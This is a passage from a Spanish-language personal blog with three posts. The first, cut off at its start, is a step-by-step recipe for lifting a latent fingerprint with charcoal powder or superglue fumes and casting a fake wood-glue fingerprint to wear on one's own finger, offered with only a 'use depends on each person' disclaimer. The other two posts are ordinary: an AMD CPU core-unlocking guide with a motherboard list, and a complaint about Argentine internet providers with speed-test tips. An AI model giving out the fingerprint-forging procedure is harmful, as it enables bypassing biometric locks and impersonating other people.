para posteriormente ser usada, he de advertir que el uso que se le de a esta información solo depende de cada cual.

El método hacer una huella visible mas usado desde hace mucho es el de aplicarle un poco de carbón en polvo (el cual lo podemos hacer con un poco de carbón vegetal –pulverizándolo y pasándolo por un cedazo, para dejarlo lo mas fino posible), otra forma es pasando la mina de un lápiz contra una lija, hasta obtener una cantidad suficiente:
A un pincel de esos que usan las mujeres para aplicarse el rímel en los pómulos (debe ser muy suave y fino) lo untamos con el polvo revelador, y lo pasamos muy suave por el lugar donde se aprecia la huella dactilar.

Otra método muy casero también pero muy efectivo es: echar unas gotas de pegante instantáneo dentro de una tapa plástica de agua mineral, y lo ponemos sobre la impresión de la forma en que se aprecia en las siguientes imágenes:





El principal ingrediente del pegante superglue produce una superficie blanca sobre la huella (mas concretamente sobre la grasa), revelándola a nuestros ojos y permitiéndonos hacer una recolección, bien sea física o de soporte fotográfico:

La siguiente parte envuelve la recolección física (En caso de que no contemos con cámara digital, pero esta parte la omito por el momento), la cual se hace con un poco de papel Contac, el proceso se hace pegando el papel sobre la impresión ya revelada, una vez la tenemos, procedemos a poner el Contac de nuevo sobre el papel blanco que lo recubre, la escaneamos y seguimos con el procedimiento para hacer el molde para hacer cuantas veces queramos nuestra huella, La clave de todo el proceso es lograr capturar o recolectar una huella fidedigna y casi exacta a la original, la cual al final es la que nos permitirá hacernos con nuestra goma o huella postiza lista para usar, para ello debemos usar un papel acetato transparente, del usado en los proyectores e imprimir las huellas con una impresora laser (es la capa que deja el toner al imprimir la clave de todo el cuento):

La impresora laser deja un pequeño pero eficiente relieve para nuestros designios que por cierto imprime la huella al revés, y como lo que necesitamos es un negativo, pues genial) esto es lo que vamos a aprovechar para crear nuestra goma:

Una vez tenemos las impresiones dactilares en el acetato procedemos a cubrir la huella con un poco de pegante para madera o Colbon que llaman:



(para hacerlo mas manejable, le agregamos un poco de glicerina)

Repartimos bien el pegante hasta formar una capa, esperamos a que se seque el pegante.

Separamos la goma seca de la hoja de acetato.

La recortamos al tamaño de nuestro dedo.

Ya para terminar con un poco de pegante natural o de teatro pegamos nuestro huella falseada a nuestro propio dedo

Listo!, ya tenemos nuestra huella trucada ¡


29.6.10

Como pagar un Phenom II x2 y tener un Phenom II x4 (Core unlocking)


a quien no le gustaria pagar casi la mitad x un micro d 4 nucleos? bueno... no es muy dificil, en la mayoria d los ultimos modelos d AMD se pueden liberar nucleos ocultos.

como a la gente le gusta cada vez mas "tocar" el hardware, los motherboards vienen con mas y mas opciones para manejar voltajes y frecuencias y eso hace q c puedan hacer cosas interesantes. lo q antes era 1 dolor d cabeza cuando teniamos q meter jumpers para configurar dmas, irqs, multiplicadores y otras porquerias, ahora aparece como opcion en casi cualquier mobo q c respete.

hace unos meses vole mi mobo asus mn2-sli deluxe... chipset... irreparable, en su momento lo pague algo asi como 250usd, no duro 3 años. conclusion despues d llevarlo a un ingeniero q fue el ultimo recurso, no comprar mobos caros, son los q mas c rompen y los q menos c pueden reparar, un asus standard es suficiente. entonces fui y compre un modesto M4A785-M.

tenia 1 athlonX2 5600 q d paso decidi cambiar, las opciones estaban entre un phenomII x3 o x4. el x4 era el 920 y el x3 720 pero "black edition", entre otras cosas es altamente overclockeable y la diferencia d precio era mucha asi q fui x el ultimo.

... suerte q compre s xq ahora es 920, y lastima q no compre el x2 550 o 555 xq hubiera sido lo mismo pero mas barato todavia xD


binning

"binning" es el proceso q hace el fabricante para testear los chips y asignarlos segun los resultados a la linea d productos q le corresponde. los chips q soportan altas velocidades con todos sus cores funcionando a la perfeccion van a la linea d punta, los q fallan c van asignando a velocidades a las q c comportan d manera estable y del mismo modo c desactivan los cores q presentan fallas.

esto x supuesto no es tan asi, cuando c lanza una nueva linea hay muchos fallos en la produccion q despues c van corrigiendo hasta q 1 porcentaje muy bajo presenta fallas. como todos los micros son fabricados con 4 nucleos llega un momento q por razones d mercado hay q desactivar si o si algunos para vender los x2 y x3... no todo el mundo (como yo) quiere gastar lo q vale el x4.

en la foto d arriba c pueden apreciar perfectamente los 4 nucleos en el 550.


AMD

en realidad AMD nunca tuvo una posicion demasiado clara sobre el tema, x 1 lado c beneficia con las ventas ya q mucha gente compra x2 y x3 ya q termina siendo una alternativa baratisima frente al quad-core d intel q cuesta una fortuna. x otro lado c hablo en 1 momento d q estaban forzando a algunos fabricantes d mobos a blockear la opcion en futuras actualizaciones d bios, cosa q parece q no paso con asus xq el mio tiene bios d enero d este año y desblockeo sin problemas.

c hacen cargo d todo el tema y x supuesto no ofrecen ningun soporte ante fallas en el desblockeo, si ellos lo blockearon x algo sera ;)


tambien puede no funcionar...

antes del proceso aviso q esta la posibilidad d q realmente tengan 1 o 2 cores dañados, la verdad q me parece bastante remota si es nuevo xq antes q el mio probe algunos y todos funcionaron, pero puede pasar.

el problema mas grave es q no bootee la maquina al hacer el cambio, ante esto con 1 simple reset d bios alcanza para tenerla otra vez funcionando, tengan a mano el manual del mobo x las dudas...

tambien puede arrancar y despues ser inestable, aca ya entramos en otro terreno. tal vez c pueda llegar a estabilizar subiendo el voltaje al micro pero no recomiendo tocar esas cosas si no saben lo q estan haciendo. el sintoma son cuelgues, pantallas azules en win, etc. en 1 palabra... inestabilidad.


motherboard

el mobo tiene q soportar la opcion ACC (Automatic Clock Calibration) o NCC (NVidia Clock Calibration) q es la respuesta de nVidia a esta nueva "moda". hay distintos modelos d chipsets q lo permiten segun la marca yendo desde precios economicos hasta la alta gama. busquen la opcion en el bios, o si van a comprar haciendo una busqueda en google c pueden checkear los modelos con soporte.

esta es 1 pequeña lista d mobos en los que se llevo a cabo el proceso con exito:



Asus

GeForce 8300
M4N78 Pro - 1004 Official Bios

nForce 980a SLI
M4N82 Deluxe - 0906 Official Bios

770G/SB710
M4A77TD PRO - 1007/0316 Official Bios

785G/SB710
M4A785D-M PRO - 405 Official Bios
M4A785M - 0503 Official Bios

785G/SB750
M4A785TD-V EVO - 0410/0602 Official Bios

790X/SB750
M4A79XTD EVO - 0605/0704 Official Bios

790FX/SB750
M3A79-T Deluxe – 0030 Mod Bios
M4A79 Deluxe – 1602 Official Bios
M4A79T Deluxe – 0079 Mod Bios/1801 Official Bios
Crosshair III Formula - 0702 / 1003

790GX/SB750
M3A78-T – 0023 Mod Bios
M4A78-E – 1204/1803 Official Bios
M4A78-E SE – 0023 Mod Bios
M4A78T-E – 1402 Official Bios

890GX/SB850
M4A89GTD-PRO/USB3 - 0307 Official Bios


Asrock

780G/SB710
A780GMH/128M - 1.50 Bios

785G/SB750
A785GMH/128M - 1.00 Bios

790GX/SB750
AOD790GX/128M – 1.40 Bios
A790GMH/128M - 1.20 Bios
A790GXH/128M – 1.20 Bios
A790GX/128M - ???


Biostar

785G/SB710
TA785GE 128m - 88GCO720CE Mod Bios

790GX/SB750
TA790GXBE
TA790GX A3+ - 78DAA616 Mod bios
TA790GX 128M – 78DEA113 Official bios
TA790GX3 A2+ - A78DA113
TA790GX A2+ - 78DBA113 Official bios - SUCCESS!!


DFI

790FX/SB750
DK 790FXB-M3H5 – 04/02/2009 Bios
DK 790FXB-M2RSH – 03/10/2009 Bios
DK 790FXB-M2RS - 02/24/2009 Bios

790GX/SB750
JR 790GX-M2RS – 10/30/2008 Bios – SUCCESS!!


Gigabyte

nForce 720D
GA-M720-US3 - F4 Bios

760G/SB710
GA-MA78LM-S2 - F1 Bios

770X/SB710
GA-770TA-UD3 - F1 Bios
GA-MA770T-UD3P - F2c/F3 Bios

785G/SB710
GA-MA785GM-US2H - F5 bios
GA-MA785GMT-UD2H - F3/F5 Bios

785GX/SB750
GA-MA785G-UD3H - F1/F5b Bios
GA-MA785GT-UD3H - F4/F5a Bios
GA-785GMT-USB3 - F1 Bios

790X/SB750
GA-MA790X-UD3P - F4 Bios
GA-MA790X-UD4 – F3 Bios
GA-MA790X-UD4P – F5/F7/F9 Bios
GA-MA790XT-UD4P - F4G/F5/F6/F7 Bios

790FX/SB750
GA-MA790FX-UD5P - F4c Bios
GA-MA790FXT-UD5P – F3b/F5 Bios

790GX/SB750
GA-MA790GP-DS4H – F3h Bios
GA-MA790GP-UD3H - F1 Bios
GA-MA790GP-UD4H – F3h Bios
GA-MA790GPT-UD3H - F2 Bios


MSI

770X/SB710
770-C45 – 1.3 Offical Bios/1.3B2 Special Bios/10.2

785G/SB710
785GT-E63 - 28.0 08/13/2009 Bios
785GTM-E45 - 8.0 09/07/2009 Bios
785GM-E65 - 2.3 Official Bios

790FX/SB750
790FX-GD70 – 1.5B1/1.5B2/1.5B3/1.7 Bios

790GX/SB750
790GX-G65 – 1.4B2 Special Bios
DKA790GX - 1.8 Bios for Platinum version of mobo
DKA790GX Platinum – 1.9b2 Bios

KA790GX - No funciona
KA790GX-M - No funciona

estos 2 ultimos mobos a pesar d tener el southbridge sb750 q es capaz d desbloquear tienen la opcion anulada.


micro

el micro depende d lo q quieran gastar y lo q quieran tener, los phenomII x2 y x3 son desbloqueables a x4 y los x4 con un poco d suerte a x6. para los q quieran gastar menos los sempron tambien son desbloqueables, x ej el sempron 140 c puede llevar a athlonII X2.

para comprar yo compraria un x2 550 o 555 black edition por la relacion calidad/precio. hay q tener en cuenta q esta edicion esta hecha para soportar overclocking y x lo tanto es mas estable q uno comun, 130usd aprox me parece un muy buen precio x 4 nucleos.


el proceso

el proceso es el mas sencillo del mundo, solo hay q buscar la opcion en el bios y ponerla en auto. en el caso del M4A785-M fui a "advanced" y dentro d la conf del micro a:

ADVANCED CLOCK CALIBRATION -> AUTO

con esto c abrio otra opcion llamada "unleashing mode", tambien la active:

UNLEASING MODE -> ENABLED

y despues aparecio donde pregunta si c quieren usar 3 o 4 cores:


ACTIVE CPU CORES -> 4 CORE OPERATION


al reiniciar me salio el msg "4 cores are activated" y despues d unas horas d test parece q todo esta ok.


ANTES


DESPUES


no c fijen en las velocidades y el multiplicador, esta activado cool&quiet como c puede ver x las diferencias d voltaje y eso hace q cambien segun el requerimiento del sistema.

ahhh.... y 1 vez mas, gracias amd!! ;)

6.6.10

Fibertel, Speedy y Telecentro (Argentina) - Como hacer para que no nos roben tanto los proveedores de internet.

es 1 realidad no solo en argentina sino en la mayoria d los paises q los proveedores d internet, a los cuales llamaremos ISP (Internet Service Provider) d ahora en adelante, no dan el servicio d deberian. a mucha gente no le importa lo mas minimo mientras puedan usar el msn y no tarden mucho en subir sus fotos a facebook, tal vez el problema mayor empieza cuando c cuelgan los videos d youtube... je

lo cierto es q la velocidad casi nunca es la q deberia ser (sobre todo en horarios pico) y q si pagamos x 1 servicio eso es lo q deberiamos recibir exactamente, mas alla d q el msn funcione o no. tambien estan los problemas d cortes d servicio, desconexiones, mala calidad, etc, pero eso ya es otra historia.

solamente voy a hablar d los 3 isp del titulo xq son los q tuve mas experiencia directa, los demas tienen sus cosas tambien pero no voy a hablar x boca d 3eros sino x experiencia propia. podria agregar a telmex, pero solo conozco los servicios corporativos. como comentario, no funciona mal, pero los dias d tormenta olvidense d la conexion...


Precios

los precios obviamente estan infladisimos, piden cerca d 140 o 150$ argentinos (casi 40usd) x una conexion d 3mbps. eso x supuesto "sin promocion" o "despues d terminada la misma". Todos los ISP dan promociones x 6 meses a mitad d precio y despues empiezan a cobrar el monto total.

la mayoria sabemos (o quiero pensar q la mayoria) q si estamos en una zona donde podemos elegir, simplemente aceptamos la promocion y en el ultimo mes pedimos la baja, con lo cual nos llama atentamente nuestro ISP unos dias antes d finalizar y nos ofrece una nueva promo, tal vez mas jugosa q la anterior. garantizo q lo hacen, sino saben q lo unico q tenemos q hacer es cambiar d proveedor x 6 meses y despues volver con otra promo.

al darse cuenta d la situacion simplemente la extienden. en fiber es automatico despues d 1 par d veces d amenazar con la baja, directamente al finalizar extienden la promo x 6 meses o 1 año. pero si nadie dice nada ni amenaza con irse x supuesto q pasan a cobrar el precio full.

x ej en fibertel estuve pagando durante casi 2 años la mitad del precio (unos 60$), cuando hace unas semanas pedi la baja x enesima vez (pero ahora d verdad) me llegaron a ofrecer cable mas 3mbps a 150$ final. asumiendo q el cable cuesta unos 120$, la conexion d 3mbps me la estarian cobrando 30$??? xD


Velocidad

el tema d la velocidad varia en cuanto a zonas pero aun pudiendo tener una buena conexion por nuestra situacion geografica, es posible llegar a tener una malisima si no la checkeamos. cuando fiber subio la velocidad d 1 a 3mbps funcionaba peor q antes. esa fue una d mis 1eras peleas con ellos q termino en 1 año a 50$.

este problema es mucho mas dificil d solucionar q el del dinero ya q para la mayoria d los "mortales" es 1 misterio como funciona internet y como saber cuanta velocidad tiene y cuanta deberia tener, y x supuesto los isp tratan d mantener este "misterio" todo lo q pueden hablando a los "profanos" con terminos q dan risa sobre problemas q dan todavia mas. la placa d red, virus, el cableado, rayos cosmicos... cualquier causa es buena para confundir al usuario y q no moleste mas x un rato.

ojo... esto no quiere decir q estos problemas no puedan existir (salvo x los rayos cosmicos), pero el 99% d las veces el problema es d ellos.

tenemos 2 tipos d conexiones diferentes entre estos proveedores, speedy es adsl y fiber y telecentro cable, el adsl corre x la linea telefonica y el cable como es obvio x la red q le corresponde. la gran diferencia entre estos 2 servicios es q el adsl tiene una conexion punto a punto hacia la central y el cable no, el cable conecta x sectores a un nodo en comun, lo q hace q si hay muchas maquinas conectadas a s nodo c sature, como pasa en muchos lugares en el caso d telecentro, q es donde mas se puede apreciar el problema.

en este caso tenemos q lograr 1ero la velocidad prometida dentro del nodo para tener una remota posibilidad d tenerla despues hacia internet, si no la tenemos c crea el tipico "cuello d botella". todo esto c puede medir, c puede reclamar y llegado el punto c puede denunciar... o cuando menos usar para q nos arreglen el servicio o nos den algun "beneficio extra" en pago x las molestias.


Speedy

Personalmente con speedy fue con los q menos problemas tuve, tal vez xq fue d los 1eros y xq tenia conocidos en la empresa... je. El problema mayormente es el soporte, cuando funciona bien x lo gral queda asi y todo oka, el tema es lograr q alguien nos atienda si tenemos problemas.

speedy es d telefonica, telefonica ya todos sabemos lo burocratica q puede llegar a ser, llegue a hacerles denuncia en la CNC (Comision Nacional de Comunicaciones) para q muden mi linea d telefono a 2 cuadras d distancia despues d 7 meses!?!?...

con speedy es mas o menos lo mismo, si les funciona bien... recen para q siga asi y si no tienen otro proveedor en su zona... recen para q aunque sea funcione. speedy llega a muchos lugares donde no llega otro proveedor y esos usuarios son los q tienen los peores problemas, tipico d cualquier monopolio.

speedy nos proporciona 1 test d velocidad en su pagina, no es confiable pero es el 1er paso al hacer 1 reclamo, la "boca d la botella", si la conexion en s test no mide lo q tiene q medir nunca lo va a hacer contra 1 server real cuando quieran bajar algo.

si tienen speedy pueden checkear el 1er tramo d su conexion aca:

www.speedy.com.ar/medidor-de-velocidad/

mas adelante 1 test confiable para todos...


Fibertel

Con fibertel es mas o menos lo mismo, si haces q funcione bien no tenes mas problemas, pero para eso tenes q hacer 200 reclamos, anotarte todos los numeritos, pedir la baja y recien ahi t va a llamar alguien ofreciendo lo q quieras.

los del soporte no entienden nada la mayoria (como d costumbre), creo q hable con casi todos. a uno c le escapo una d las 1eras veces q llame la pagina d testeo, digo "c le escapo" xq despues extrañamente nadie me "invitaba" a hacer 1 test d velocidad, entonces les decia q "en una llamada anterior me pasaron esta pagina" y al mostrarles los resultados no podian inventar mucho.

la web para checkear la velocidad de fiber es esta:

http://sps.fibertel.com.ar/

si vamos a:

pruebas d velocidad -> download

encontramos 2 tipos d descargas, nacional e internacional. esto es muy bueno xq podemos mediante su propio test checkear tanto en servidores propios d fibertel como en servidores externos. x lo gral la descarga nacional es perfecta y el problema esta con la internacional, a pesar d ser cable fiber tiene mejor estructura q telecentro y no hay tanta saturacion en los nodos, igualmente 1ero es bueno checkear la nacional.

la internacional va cambiando periodicamente, pero x lo gral no tengo quejas, son servers normales d internet desde donde tranquilamente c podria estar descargando algo. en este momento la descarga 3 es 1 rpm del wireshark xD... andaran en cosas raras estos chicos? je

si la descarga no va a la velocidad q deberia o cerca, llamen, pidan 1 num d caso d soporte y anotenlos todos.

otro tema q daria mucho para hablar sobre fiber es el conocido blockeo d puertos. muchas cosas estan blockeadas, no llegue nunca a saber cuantas exactamente pero son bastantes. para un user normal no tiene mucha importancia, para uno avanzado puede llegar a traer bastantes problemas y en todo caso me parece una invasion a la conexion.

si yo quiero tener una casa con 3 puertas y viene el estado y me pone pared en 2 diciendo q necesito 1 sola y q asi es mas seguro... deberia dejar q lo haga? o deberia encargarme yo d decidir cuantas puertas quiero? ademas... no deberian x lo menos avisarme q estan clausurando mis puertas?


Telecentro

telecentro... telecentro... si, cai en la trampa d telecentro, como dije antes estoy en 1 zona con muchos isp y me gusta probar. cable digital, internet 3mbps y telefonia ip a 160$... barato no? xD

con la telefonia no tenia muchas esperanzas, c corta todo el tiempo, da ocupado, si le pongo el inalambrico hace 1 ruido terrible y no es el trafo, ni la linea d corriente, ni el cable, ni "ponele 1 filtro d rf", ni nada q c pueda calificar d "normal". el soporte dice "sr, es el telefono obviamente" a lo cual respondo "en este momento t hablo desde s telefono pero desde 1 linea tradicional y funciona perfecto"... silencio... me recomienda poner otro filtro... cruzamos un par d frases forzadas y le corto.

el dia d la instalacion cuando ponen el modem checkeo velocidad contra telecentro, todo ok, contra 1 servidor en usa, todo ok, europa, todo oka, firmo contento y creo q esta todo bien... gran error.

ya venia el fin d semana y no tuve mucha oportunidad d usar la conexion, a la semana siguiente x la tarde me parecio notarla lenta, checkeo y no llegaba al mega. al principio crei q me habian cambiado a 1mbps, despues me di cuenta q era problema d saturacion cuando c libero despues d las 12 d la noche.

la mayoria d los isps ante 1 problema asi alegan cualquier cosa (como rayos cosmicos) pero telecentro tiene el descaro d hacerse cargo, ante 1 correo al sopote (cansado d esperar q me atiendan x tel) con capturas d pantalla d las mediciones y 1 completa descripcion del problema me respondieron lo siguiente:

Estimado Sr.
Le informamos que gracias a su reclamo, y sumados a otros, se están preparando tareas abocándose al desperfecto que provoca fluctuación del ancho de banda en determinadas franjas horarias. Pedimos disculpas por el inconveniente. Esta información fue sacada gracias al RA XXXXXX.
Desde ya, muchas gracias.
Buenas días.


Departamento de Soporte Técnico
Telecentro S.A.
soporte@telecentro.net.ar
www.telecentro.com.ar
6380-9500


o sea... traducido:

Estimado Estafado.

Le informamos q su conexion nunca va a funcionar a lo q ud paga dado q no tenemos la estructura necesaria para el numero d clientes q poseemos. Seguiremos sumando clientes para tratar d pagar una estructura q cada vez queda mas chica.
Buenas? dias.


para q venden conexiones q no pueden dar?... en fin, veremos si c puede sacar algo d esto y sino... a cambiar d vuelta.

la pagina de telecentro para hacer test d velocidad es:

http://velocidad.telecentro.net.ar/

ahhh... el cable c v impecable, mucho mejor q cablevision y mas canales xD


Test de velocidad fiable

Los tests d velocidad d las paginas no son fiables xq no miden la velocidad en condiciones reales, el de telecentro es una mentira q jamas sale siquiera a internet, solo mide la velocidad dentro d su propia red... y aun asi no mide lo q deberia. esta sacado d la pagina q pongo a continuacion donde tienen 1 server propio. no digo q es 1 mentira x la medicion en si sino x las condiciones en q c hace.

para tener 1 medicion real tenemos q checkear contra servidores internacionales q es donde navegamos generalmente y d donde bajamos cosas o vemos videos. para hacer 1 medicion real vamos a esta pagina:

http://www.speedtest.net/

este es mi resultado en telecentro 1 sabado a la tarde... y dio bastante bien (ni comento el ping d 158ms en mi propia red...):

con esta conexion, baje d donde sea no voy a pasar los 2.1mbps en el mejor d los casos. la velocidad a miami.fl, usa x ej:

y a 1 server en leipzig, deutschland:

bastante lejos d lo prometido no? para hacer el test simplemente tienen q pinchar en uno d los servers y esperar q la pagina haga el resto.

al terminar provee d 1 link en la parte inferior junto con los resultados, haciendo click en "copy direct link" c carga en el portapapeles. este link es aceptado como un test valido para gran cantidad d instituciones a nivel internacional y es muy fiable.


Conclusion

todos los isps van a tratar d darles lo minimo posible, lo ideal es checkear q este todo ok y en caso d q no reclamar 1ero a ellos, si no solucionan el problema directamente a la CNC. en una entrada anterior hay algo d info d donde y como hacer la denuncia y les aseguro q da resultados, pueden verla aca:

|_ocutus&CNDC vs Samsung y |_ocutus&CNC vs Telefonica